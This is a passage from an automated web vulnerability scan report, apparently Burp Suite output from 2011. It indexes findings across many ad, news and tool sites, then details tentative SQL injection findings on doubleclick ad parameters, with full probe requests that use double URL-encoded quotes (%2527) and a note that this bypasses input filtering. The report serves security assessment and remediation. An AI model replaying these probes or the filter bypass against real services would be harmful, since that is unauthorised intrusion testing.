19.76. http://support.domaintools.com/index.php

19.77. http://translate.google.com/translate_t

19.78. http://webcache.googleusercontent.com/search

20. Cross-domain script include

20.1. http://a.tribalfusion.com/j.ad

20.2. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

20.3. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

20.4. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

20.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

20.6. http://ad.turn.com/server/ads.js

20.7. http://ad.turn.com/server/ads.js

20.8. http://ad.turn.com/server/ads.js

20.9. http://analytics.microsoft.com/Sync.html

20.10. http://analytics.msn.com/Include.html

20.11. http://blog.domaintools.com/

20.12. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

20.13. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

20.14. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

20.15. http://cdn5.tribalfusion.com/media/1956006/frame.html

20.16. http://cdn5.tribalfusion.com/media/2516896//frm.html

20.17. https://clients6.google.com/static/proxy.html

20.18. http://community.axosoft.com/

20.19. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

20.20. http://dyn.com/

20.21. http://dyn.com/please-try-again

20.22. http://explore.live.com/windows-live-hotmail-security-checklist-faq

20.23. http://feed.domaintoolsblog.com/domaintools/

20.24. http://feedinformer.com/search.php

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://ib.adnxs.com/ttj

20.29. http://ib.adnxs.com/ttj

20.30. http://ib.adnxs.com/ttj

20.31. http://ib.adnxs.com/ttj

20.32. http://images.bestbuy.com/BestBuy_US/store/js/dart-min.js

20.33. http://images.bestbuy.com/BestBuy_US/store/js/google-min.js

20.34. http://jqueryui.com/about

20.35. http://jqueryui.com/themeroller/

20.36. http://lookupserver.com/

20.37. http://mad4milk.net/

20.38. http://mobilebeta.microsoft.com/en-us/default.mspx

20.39. http://mzima.net/

20.40. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm

20.41. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm

20.42. http://news.bbc.co.uk/sport2/hi/football/14168601.stm

20.43. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm

20.44. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm

20.45. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm

20.46. http://picasaweb.google.com/lh/view

20.47. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

20.48. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

20.49. http://satuit.com/

20.50. http://satuit.com/en/Products/SatuitSIP.aspx

20.51. http://satuit.com/products.aspx

20.52. https://secure.domaintools.com/join/

20.53. https://secure.domaintools.com/log-in/

20.54. https://secure.domaintools.com/shopping-cart/

20.55. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

20.56. http://social.technet.microsoft.com/Forums/en-us/category/forefront

20.57. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

20.58. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

20.59. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

20.60. http://technet.microsoft.com/en-us/security/bb969102

20.61. http://technet.microsoft.com/en-us/security/bb980617

20.62. http://technet.microsoft.com/en-us/security/cc261637

20.63. http://technet.microsoft.com/en-us/security/cc297183.aspx

20.64. http://whois.domaintools.com/

21. File upload functionality

22. TRACE method is enabled

22.1. http://amch.questionmarket.com/

22.2. http://applenberry.com/

22.3. http://apps.dnsstuff.com/

22.4. http://bh.contextweb.com/

22.5. http://blog.domaintools.com/

22.6. http://dg.specificclick.net/

22.7. http://dnsstuff.com/

22.8. http://image2.pubmatic.com/

22.9. http://legolas.nexac.com/

22.10. http://picasaweb.google.com/

22.11. http://pixel.rubiconproject.com/

22.12. http://r.openx.net/

22.13. http://rt.legolas-media.com/

22.14. http://sa.bbc.co.uk/

22.15. https://secure.domaintools.com/

22.16. http://support.domaintools.com/

22.17. http://t.mookie1.com/

23. Email addresses disclosed

23.1. http://67.228.151.70:81/javascripts/controls.js

23.2. http://ads1.msn.com/library/dap.js

23.3. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js

23.4. http://applenberry.com/store/js/mage/cookies.js

23.5. http://applenberry.com/store/js/mage/translate.js

23.6. http://applenberry.com/store/js/scriptaculous/controls.js

23.7. http://applenberry.com/store/js/scriptaculous/dragdrop.js

23.8. http://applenberry.com/store/js/varien/form.js

23.9. http://applenberry.com/store/js/varien/js.js

23.10. http://applenberry.com/store/js/varien/menu.js

23.11. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/print.css

23.12. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/styles.css

23.13. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/widgets.css

23.14. http://blog.domaintools.com/

23.15. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

23.16. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

23.17. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

23.18. http://dyn.com/

23.19. http://feed.domaintoolsblog.com/domaintools/

23.20. http://groups.google.com/groups

23.21. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

23.22. http://i4.social.s-msft.com/Forums/GlobalResources/Scripts/omni_rsid_social_min.js

23.23. http://ibid4216487243.plumd.dnsstuff.com/style.css

23.24. http://images.bestbuy.com/BestBuy_US/store/js/jQuery/plugins/colorbox/colorbox/jquery.colorbox-min.js

23.25. http://jqueryui.com/about

23.26. http://jqueryui.com/themeroller/scripts/app.js

23.27. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

23.28. https://secure.domaintools.com/log-in/

23.29. http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/script/blq_core.js

23.30. http://static.bbc.co.uk/frameworks/barlesque/1.8.33//desktop/2.7/script/blq_core.js

23.31. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

23.32. http://support.dnsstuff.com/News/1/default-news-item.aspx

23.33. http://support.dnsstuff.com/News/root.aspx

24. Private IP addresses disclosed

24.1. http://api.facebook.com/restserver.php

24.2. http://api.facebook.com/restserver.php

24.3. http://api.facebook.com/restserver.php

24.4. http://api.facebook.com/restserver.php

24.5. http://api.facebook.com/restserver.php

24.6. http://api.facebook.com/restserver.php

24.7. http://api.facebook.com/restserver.php

24.8. http://api.facebook.com/restserver.php

24.9. http://api.facebook.com/restserver.php

24.10. http://api.facebook.com/restserver.php

24.11. http://connect.facebook.net/en_US/all.js

24.12. http://external.ak.fbcdn.net/safe_image.php

24.13. http://external.ak.fbcdn.net/safe_image.php

24.14. http://external.ak.fbcdn.net/safe_image.php

24.15. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

24.16. http://static.ak.fbcdn.net/connect.php/css/share-button-css

24.17. http://static.ak.fbcdn.net/connect.php/js/FB.Share

24.18. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.19. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.20. http://static.ak.fbcdn.net/images/connect_sprite.png

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/OxZAKD4r3bd.css

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

24.25. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

24.26. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

25. Social security numbers disclosed

26. Robots.txt file

26.1. http://67.228.151.70:81/statistics/logging/37KUDZMT2R

26.2. http://a.tribalfusion.com/j.ad

26.3. http://ad.afy11.net/ad

26.4. http://ad.technoratimedia.com/unpixel

26.5. http://ad.turn.com/server/ads.js

26.6. http://ad.yieldmanager.com/pixel

26.7. https://adwords.google.com/um/StartNewLogin

26.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

26.9. http://amch.questionmarket.com/adscgen/st.php

26.10. http://api.bizographics.com/v1/profile.redirect

26.11. http://api.facebook.com/restserver.php

26.12. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

26.13. http://b.scorecardresearch.com/b

26.14. http://b.voicefive.com/b

26.15. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

26.16. http://beacon.afy11.net/ad

26.17. http://blog.domaintools.com/feed/

26.18. http://c.betrad.com/surly.js

26.19. http://cbk0.google.com/

26.20. http://cdn.turn.com/server/ddc.htm

26.21. http://cdn5.tribalfusion.com/media/2516896//frm.html

26.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

26.23. http://citi.bridgetrack.com/a/s/

26.24. http://citicorporate.d2.sc.omtrdc.net/b/ss/citiccitigroupcomprod/1/H.21/s84572543601971

26.25. http://clients1.google.com/generate_204

26.26. https://clients6.google.com/static/proxy.html

26.27. http://cm.g.doubleclick.net/pixel

26.28. http://cms.quantserve.com/dpixel

26.29. http://code.google.com/apis/maps/terms.html

26.30. http://community.spiceworks.com/r/595

26.31. http://dnsstuff.com/new-tools-a-upgrades

26.32. http://docs.google.com/

26.33. http://dyn.com/

26.34. http://feed.domaintoolsblog.com/domaintools/

26.35. http://feedinformer.com/

26.36. http://feeds.bbci.co.uk/news/rss.xml

26.37. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

26.38. http://gmf-aeroasia.co.id/

26.39. http://go.microsoft.com/fwlink/

26.40. http://googleads.g.doubleclick.net/pagead/ads

26.41. http://groups.google.com/groups

26.42. http://gtssldv-crl.geotrust.com/crls/gtssldv.crl

26.43. http://i1.ytimg.com/i/DVWCsxpo_gOkD9Rc4bL_gQ/1.jpg

26.44. http://ibid2252027210.peachd.dnsstuff.com/style.css

26.45. http://ibid2252027210.plumd.dnsstuff.com/style.css

26.46. http://in.getclicky.com/in.php

26.47. http://jqueryui.com/about

26.48. http://khm0.google.com/kh/v/x3d88/x26

26.49. http://khm1.google.com/kh/v/x3d88/x26

26.50. http://khmdb0.google.com/kh

26.51. http://khmdb1.google.com/kh

26.52. http://konax.kontera.com/publisher_tail/generatedPublisherConfig.js

26.53. http://legolas.nexac.com/lgalt

26.54. http://mail.google.com/mail/

26.55. http://maps.google.com/maps

26.56. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

26.57. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s89093963636551

26.58. http://meyerweb.com/eric/tools/css/reset/

26.59. http://mobilebeta.microsoft.com/office/communicatormobile/java/download.aspx

26.60. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

26.61. http://news.bbcimg.co.uk/js/newsi/latest/newsi.js

26.62. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.63. http://pagead2.googlesyndication.com/pagead/show_ads.js

26.64. http://partner.domaining.com/link/

26.65. http://picasaweb.google.com/lh/view

26.66. https://plusone.google.com/u/0

26.67. http://r.turn.com/r/beacon

26.68. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

26.69. http://rd.rlcdn.com/rd

26.70. http://rt.legolas-media.com/lgrt

26.71. http://sa.bbc.co.uk/bbc/bbc/s

26.72. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.73. http://satuit.com/

26.74. https://secure.domaintools.com/log-in/

26.75. http://segment-pixel.invitemedia.com/set_partner_uid

26.76. http://sites.google.com/

26.77. http://spe.atdmt.com/ds/NMMRTSHARWPH/Q1_WP7_ZuneOffer/MSCOM_WP7_Q4_ZuneOffer_160x600.jpg

26.78. http://ssl.gstatic.com/gb/js/sem_d8da90aa15552b1b6c43db160e9dbc9c.js

26.79. https://ssl.gstatic.com/gb/js/gcm_b1be572aff2630578d6077ebe3f660a9.js

26.80. http://support.dnsstuff.com/AvatarHandler.ashx

26.81. http://support.domaintools.com/

26.82. http://sync.mathtag.com/sync/img

26.83. http://tag.admeld.com/pixel

26.84. http://tf.nexac.com/media/1809966/na.html

26.85. http://translate.google.com/translate_t

26.86. http://turn.nexac.com/r/pu

26.87. http://webcache.googleusercontent.com/search

26.88. http://whois.domaintools.com/

26.89. http://whos.amung.us/pjswidget/

27. Cacheable HTTPS response

27.1. https://clients6.google.com/static/proxy.html

27.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

28. HTML does not specify charset

28.1. http://a.tribalfusion.com/p.media/aVmNBGSGbZa5AQZdmWAtTtQ80U3aXFQjXayOSFUGWUYPWHr2mbQtQbZbpYqYt3TBc2qvXmTMB1b39UWjXnmYZdnGYnptbH5EFk5tZaN46BGnbbZaYVbT1cr50cvupE7P5U3RWr7AV673PEnYPGUsQdUtYdftWmUu4GM1XrZbDXDmB9dNPwm/2522456/frame.html

28.2. http://a.tribalfusion.com/p.media/aWmNBGXWQAndPm4mJ15Vj9TcM7VsFiPPZbmTHYVWrbS2U6pWajrWan8Qa3ZcQVFARb6pRH7bUGjU4UmxnWEnXqPu3WfZbSGMD2mrHpH6yTHQ9Yrb61Ufg0EqqPrQDWUY3WHYYnUQoPU7sXa3t5EUc2qn3nEZbD1FfdUdMXyprwhXw8Do/2020316/frame.html

28.3. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

28.4. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

28.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

28.6. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

28.7. http://amch.questionmarket.com/adscgen/st.php

28.8. http://analytics.microsoft.com/Sync.html

28.9. http://analytics.msn.com/Include.html

28.10. http://applenberry.com/tools/redmondpie.php

28.11. http://cache.vzw.com/scripts/globalnav/blank.html

28.12. http://cdn5.tribalfusion.com/media/1956006/frame.html

28.13. http://cdn5.tribalfusion.com/media/2516896//frm.html

28.14. http://cgibin.erols.com/favicon.ico

28.15. http://ds.addthis.com/red/psi/sites/www.healthcentral.com/p.json

28.16. http://feedinformer.com/

28.17. http://feedinformer.com/tg.php

28.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

28.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

28.20. http://ibid4216487243.plumd.dnsstuff.com/style.css

28.21. http://jqueryui.com/about

28.22. http://jqueryui.com/themeroller/

28.23. http://news.bbcimg.co.uk/view/1_0_6/wide/hi/shared/img/news_sprite_02.gif

28.24. http://ocsp.entrust.net/

28.25. http://odb.outbrain.com/utils/ping.html

28.26. http://p4.af2x4wmlt2kyi.bv53f33zp4ylturd.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

28.27. http://p4.af2x4wmlt2kyi.bv53f33zp4ylturd.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

28.28. http://platform0.twitter.com/widgets/follow_button.html

28.29. http://platform1.twitter.com/widgets/follow_button.html

28.30. http://satuit.com/favicon.ico

28.31. http://sensor2.suitesmart.com/sensor4.js

28.32. http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257

28.33. http://tf.nexac.com/media/1809966/na.html

28.34. http://uac.advertising.com/wrapper/aceUACping.htm

29. HTML uses unrecognised charset

30. Content type incorrectly stated

30.1. http://a.rad.msn.com/ADSAdClient31.dll

30.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

30.3. http://a3.twimg.com/profile_images/348452570/NewLogo_normal.gif

30.4. http://amch.questionmarket.com/adscgen/st.php

30.5. http://api.twitter.com/1/urls/resolve.json

30.6. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

30.7. http://cache.vzw.com/globalnav/globalnavmenu.txt

30.8. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

30.9. http://i3.social.s-msft.com/Forums/en-US/resources.js

30.10. http://ibid2252027210.peachd.dnsstuff.com/style.css

30.11. http://ibid2252027210.plumd.dnsstuff.com/style.css

30.12. http://ibid4216487243.plumd.dnsstuff.com/style.css

30.13. http://jqueryui.com/themeroller/images/themeGallery/theme_90_ui_light.png

30.14. http://kona5.kontera.com/KonaGet.js

30.15. http://lookupserver.com/favicon.ico

30.16. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

30.17. http://rad.msn.com/ADSAdClient31.dll

30.18. http://rtb0.doubleverify.com/rtb.ashx/verifyc

30.19. http://s3.buysellads.com/1239116/63402-1307193749.gif

30.20. http://s3.buysellads.com/1239116/65107-1308490127.gif

30.21. http://sales.liveperson.net/hcp/html/mTag.js

30.22. http://satuit.com/favicon.ico

30.23. http://sensor2.suitesmart.com/sensor4.js

30.24. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

30.25. http://whos.amung.us/psrvwidget/

31. Content type is not specified

31.1. http://gmf-aeroasia.co.id/favicon.ico

31.2. http://paid.outbrain.com/network/redir

31.3. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

31.4. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard



1. SQL injection
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931738&bpp=1%2527&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264%2C2520014514&correlator=1311007922811&frm=4&adk=1308792938&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1315&bih=853&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=4&dtd=31&xpc=YknUSNb59R&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 16:58:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 12758
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
YaHR0cDovL2xvb2t1cHNlcnZlci5jb20v4AEEgAIBqAMByAMf6AM16AP2COgDowX1AwAAAMQ&num=2&sig=AOD64_2N1HfGG5Yn1ORL9lB-ECoF3FTcbQ&client=ca-pub-6114143813287942&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dserver%2520log%2520analyzer%26_kt%3Df770026c-4db3-48ef-8558-542126e42c16" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_b
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931738&bpp=1%2527%2527&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264%2C2520014514&correlator=1311007922811&frm=4&adk=1308792938&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1315&bih=853&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=4&dtd=31&xpc=YknUSNb59R&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 16:58:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 12588
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The dt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dt request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 5426
X-XSS-Protection: 1; mode=block

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 14221
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

